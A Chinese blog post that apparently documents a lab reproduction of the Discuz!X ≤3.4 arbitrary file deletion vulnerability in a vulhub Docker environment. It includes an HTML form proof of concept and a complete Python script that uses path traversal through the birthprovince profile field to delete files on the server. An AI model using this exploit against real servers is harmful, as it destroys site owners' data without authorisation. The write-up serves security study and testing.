Discuz任意文件删除

已于 2022-04-02 19:58:32 修改
阅读量3.8k 收藏 1
点赞数 1
分类专栏: 渗透测试实验 文章标签: java php 安全
于 2022-04-01 11:01:44 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_51459600/article/details/123892740
版权

Discuz任意文件删除

实验环境

官方于2017年9月28日对源码进行了修复,这里利用docker搭建环境:

cd vulhub/discuz/x3.4-arbitrary-file-deletion/
docker-compose up -d

服务器:CentOS7

攻击机:物理机(10.10.10.1)

环境搭建好后开始安装DZ

漏洞复现

  1. 在服务器DZ根目录下建立hummer.txt文件,利用漏洞删除该文件

    检查hummer.txt文件存在

  2. 注册Discuz用户,尝试修改个人信息

    http://10.10.10.142/Discuz/home.php?mod=spacecp

    填写个人信息后对该请求抓包:

    从图中可以得到hummer用户的formhash=4c8ba00c

    将birthprovince的值改为要删除的文件名(hummer.txt)

    然后放包:

    可以看到已经成功将birthprovince的值改为了要删除的文件名

  3. 构造POC:

    <form action="http://10.10.10.142/Discuz/home.php?mod=spacecp&ac=profile&op=base&deletefile[birthprovi
nce]=aaaaaa" method="POST" enctype="multipart/form-data">
<input type="file" name="birthprovince" id="file" />
<input type="text" name="formhash" value="89b14d12"/></p>
<input type="text" name="profilesubmit" value="1"/></p>
<input type="submit" value="Submit" />
</from>

    点击提交后,会有如下响应:

    此时文件已经成功删除了

    1. 自动化脚本:
    # -*- coding: utf-8 -*- 
# @Time : 2022/4/1 16:22 
# @Author : hummer
# @File : Discuz.py

import requests
import re

'''
Discuz!X <=3.4 任意文件删除漏洞
'''


def get_cookie():
    cookies={}
    for line in raw_cookies .split(';'):
        key,value = line.split('=',1)
        cookies[key]=value
    return cookies

def get_formhash(url):
    cookies = get_cookie()
    testurl = url + "/home.php?mod=spacecp"
    html = requests.get(testurl,cookies=cookies)
    com = re.compile('<input type="hidden" name="formhash" value="(.*?)" />')
    result = com.findall(html.text)
    return result[0]

def del_step1(url,filename):
    headers={
        'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0',
    }
    geturl = url + "/home.php?mod=spacecp&ac=profile&op=base"
    formhash=get_formhash(url)
    print("formhash: " + formhash)
    payload = {'birthprovince':filename,'profilesubmit':1,'formhash':formhash}
    cookies = get_cookie()
    html = requests.post(geturl,headers=headers,data=payload,cookies=cookies)
    if html.text.find('parent.show_success')>0:
        print('Step1 success!')

def del_step2(url):
    geturl = url + '/home.php?mod=spacecp&ac=profile&op=base&deletefile[birthprovince]=aaaaaa'
    headers = {'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0'}
    formhash = get_formhash(url)
    files = {'formhash':(None,formhash),'birthprovince':('1.jpg',open('1.jpg','rb'),'image/jepg'),'profilesubmit':(None,1)}
    cookies = get_cookie()
    r = requests.post(geturl,files=files,headers=headers,cookies=cookies)
    if r.text.find('parent.show_success')>0:
        print("Step2 success!")

if __name__ == '__main__':
    raw_cookies = "QEWn_2132_saltkey=jB44A7n7; QEWn_2132_lastvisit=1648895823; QEWn_2132_sid=KrpF5f; QEWn_2132_lastact=1648899609%09home.php%09misc; QEWn_2132_sendmail=1; QEWn_2132_seccode=1.21187a98997a88f189; QEWn_2132_ulastactivity=9ebcAx%2FzsiL2Ju3gB4nnVG5GBBHyFTeCzO6%2FbmGu9WxSCw8brZTS; QEWn_2132_auth=afde08MuW%2BAKdFLrgYSqhflGjsYLnWVSBtpPs6HBpmnwkPkewQvRZIgT1G6mgVSIU7FxCC9L84iX7RSX2PIb; QEWn_2132_nofavfid=1; QEWn_2132_onlineusernum=1; QEWn_2132_noticeTitle=1"

    url = 'http://10.10.10.145'
    del_step1(url,'../../../hummer.txt')
    del_step2(url)

    运行结果如下:

漏洞复现完成

Hummer-200
关注
专栏目录
Discuz!运行日志记录函数runlog详解
土著人宁巴的Discuz!专栏
04-01 1万+
discuz!的\data\log\目录下,我们会看到很多格式如YYYYMM_XX.php文件(如下图所示),打开文件我们就会看到很多操作日志,这些日志怎么生成的呢,今天我们就来看看Discuz!运行日志记录runlog函数 runlog函数定义文件 \source\function\function_core.php function runlog($file, $m
Discuz X3.2版的任意文件删除漏洞
xd_12138的博客
11-28 8153
漏洞测试环境如下:PHP5.2+MYSQL+ Discuz X3.2   搭建好 Discuz X3.2环境后,首先在服务器下新建一个文本文档作为目标文件 然后按照正常用户步骤操作,登录论坛后在如下界面中点击  设置  跳转至下图界面 注意注意,重点来了 访问URL 为 http://10.1.1.100/discuz-X3.2/upload/home.php?mod=sp...
Discuz!X ≤3.4 任意文件删除漏洞
haha1314的博客
07-15 3832
Discuz!X ≤3.4 任意文件删除漏洞 影响版本:Discuz!X ≤3.4 漏洞复现 访问http://your-ip/robots.txt可见robots.txt是存在的: [外链图片转存失败(img-Na16JIU5-1563163104782)(2.png)] 注册用户后,在个人设置页面找到自己的formhash: [外链图片转存失败(img-Lh7j02hX-15631631047...
discuz各个目录与文件的作用说明
weixin_30399821的博客
06-15 2991
discuz下面有很多文件夹以及文件,你们都知道他们是做什么的么?肯定不知道了吧。但是我们有经常遇到这些文件,譬如在后台文件校验操作都遇到某些文件被修改,这时候也需要知道这些文件是有什么作用的。今天就为大家详细介绍全部的文件夹以及文件的作用先从根目录开始,根目录文件一般都是入口,即执行具体功能的代码一般不在这些文件中,而是在其调用的文件中admin.ph...
DiscuzX ≤3.4 任意文件删除漏洞
zizizizizi_的博客
01-17 2783
Discuz!X ≤3.4 任意文件删除漏洞 一、漏洞思路 通过配置个人信息的属性值,删除任意文件 版本 :discuz <= 3.4 二、漏洞复现 1.安装数据库 2.查看robots文件,发现文件存在 3.注册登录,进入设置界面 4.找到formhash值并记录 5.点击保存 ,bp拦截 发送如下 ...
Discuz全版本任意文件删除漏洞
zsd747289639的博客
09-30 4867
Discuz全版本任意文件删除漏洞验证用的版本:discuz3.2 0x1首先在根目录下新建一个文件 0x2 构造poc1修改出生地区 注意其中的formhash需要替换掉,具体是在源码中找。 为什么这里要替换掉formhash呢? 一开始不太清楚,网页会报错,如下看到了有一个xss验证蛮去找一下这个文件private function _xss_check() { stat
利用Vulnhub复现漏洞 - Discuz!X ≤3.4 任意文件删除漏洞
JiangBuLiu的博客
06-28 3258
Apache SSI 远程命令执行漏洞Vulnhub官方复现教程漏洞原理复现漏洞启动环境漏洞复现FormhashCookie发送数据包 Vulnhub官方复现教程 https://vulhub.org/#/environments/httpd/ssi-rce/ 漏洞原理 在测试任意文件上传漏洞的时候,目标服务端可能不允许上传php后缀的文件。如果目标服务器开启了SSI与CGI支持,我们可以上传一个...
discuz 任意管理员密码漏洞利用工具 vbs代码
09-05
SQL 注入是一种常见的网络安全攻击手段,通过在输入字段中插入恶意 SQL 代码,以获取、修改或删除数据库中的数据。在这个例子中,攻击者构造了一个 SQL 语句,其目的是合并到原始查询中,从而获取指定用户(由 `...
Discuz! X 3.4 ML 任意代码执行漏洞复现
墙角睡大觉的专栏
07-13 3984
0X1 漏洞概述 2019年7月11日,网络上出现了一个Discuz!ML远程代码执行漏洞的PoC,研究员验证分析发现,攻击者能够利用该漏洞在请求流量的cookie字段中(language参数)插入任意代码,执行任意代码,从而实现完全远程接管整个服务器的目的,该漏洞利用方式简单,危害性较大。漏洞影响范围包括如下版本。 Discuz! ML v.3.4、Discuz! ML v.3.3、Discuz...
Discuz!X 3.4任意文件删除漏洞
若把此心以学道,即身成佛有何难
10-05 730
文笔生疏,措辞浅薄,望各位大佬不吝赐教,万分感谢。
spring循环依赖解决方式
qq_36400213的博客
11-04 890
字段注入和setter注入则提供了更多的灵活性,但需要更谨慎地管理对象的状态。方法注入和注解注入则适用于特定的场景。在Spring框架中,依赖注入(Dependency Injection,DI)是一种实现控制反转(Inversion of Control,IoC)的机制,用于将对象的依赖关系自动注入到对象中。这种方式不如构造器注入严格,但比字段注入更灵活,因为它可以在不创建新实例的情况下改变对象的依赖。这种方式是推荐的,因为它可以保证对象在创建时就处于完全初始化的状态,并且可以使得bean不可变。
JAVA-01-变量
LJH_laura_li的博客
11-08 161
在方法、构造函数或块内部定义的变量。
2024年华为OD机试真题-查找充电设备-C++-OD统一考试(E卷)
面试高手的博客
11-08 44
某个充电站,可提供n个充电设备只,每个充电设备均有对应的输出功率任意个充电设备组合的输出功率总和,均构成功率集合P的1个元素功率集合P的最优元素,表示最接近充电站最大输出功率pmax 的元素。每一题都含有详细的解题思路和代码注释,精编c++、JAVA、Python三种语言解法。当充电设备输出功率50、20、20组合时,其输出功率总和为90,最接近充电站最大充电输出功率,因此最优元素为90。所有充电设备的输出功率组合,均大于充电站最大充电输出功率30,此时最优元素值为0。第 2 行为每个充电设备的输出功率。
JAVA学习接口案例实例
最新发布
shangan_3的博客
11-08 105
【代码】JAVA学习接口案例实例。
每日OJ题_牛客_相差不超过k的最多数_滑动窗口_C++_Java
参考书籍:《C语言程序设计》《数据结构》《C++ Primer》《Effective C++》《STL源码剖析》《现代操作系统》《UNIX环境高级编程》《图解TCP/IP》《图解HTTP》《Linux高性能服务器编程》《剑指Offer》《算法导论》
11-04 420
每日OJ题_牛客_相差不超过k的最多数_滑动窗口_C++_Java(排序容易想,但是滑动窗口不容易想到,核心思想:使用滑动窗口算法通过动态调整窗口的大小,遍历所有符合条件的连续子序列,求得最大连续子序列的长度。)
Java知识】Java基础-对象排序的实现
wendao76的专栏
11-04 368
方法,并且需要提供一个比较器(Comparator)来定义对象的排序逻辑。这些示例展示了如何在Java中对对象进行排序,无论是使用列表还是数组,都可以灵活地使用比较器来定义排序规则。在Java中,对象的排序通常涉及到使用。
greendao使用封装
白高林的专栏
11-07 324
greenDAO
MySQL 到 ClickHouse 数据同步优化(三)
Kami‘s home
11-08 646
CloudCanal 再次优化 MySQL 到 ClickHouse 数据链路,大幅提升数据同步性能,帮助业务快速构建实时数据分析环境。
JAVAJava基础—面向对象编程基础:类与对象的概念
thinking_chou的专栏
11-07 918
类是一个用户定义的数据类型,它包含了属性和方法。属性用于描述对象的特征,方法用于描述对象的行为。类与对象是Java编程的核心概念。类是对象的蓝图,定义了对象的属性和方法;对象是类的实例,具有独立的状态和行为。通过类与对象,我们可以更好地模拟现实世界中的事物,使得程序设计更加清晰和模块化。
【前端】JavaScript 方法速查大全-DOM、BOM、时间、处理JS原生问题(三)
万物皆有灵
11-06 933
在现代Web开发中,JavaScript是不可或缺的编程语言。无论是前端开发还是后端服务,掌握JavaScript的各种方法和技巧都是每位开发者的必修课。本文将为您提供一个全面、系统的JavaScript方法参考,涵盖数组操作、对象处理、DOM与BOM接口、时间处理、解决JS原生问题、函数应用、正则表达式、数据格式转换、随机数生成、文本处理等众多方面。无论您是初学者还是资深开发者,这份速查大全都将成为您日常开发中的得力助手!💪。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值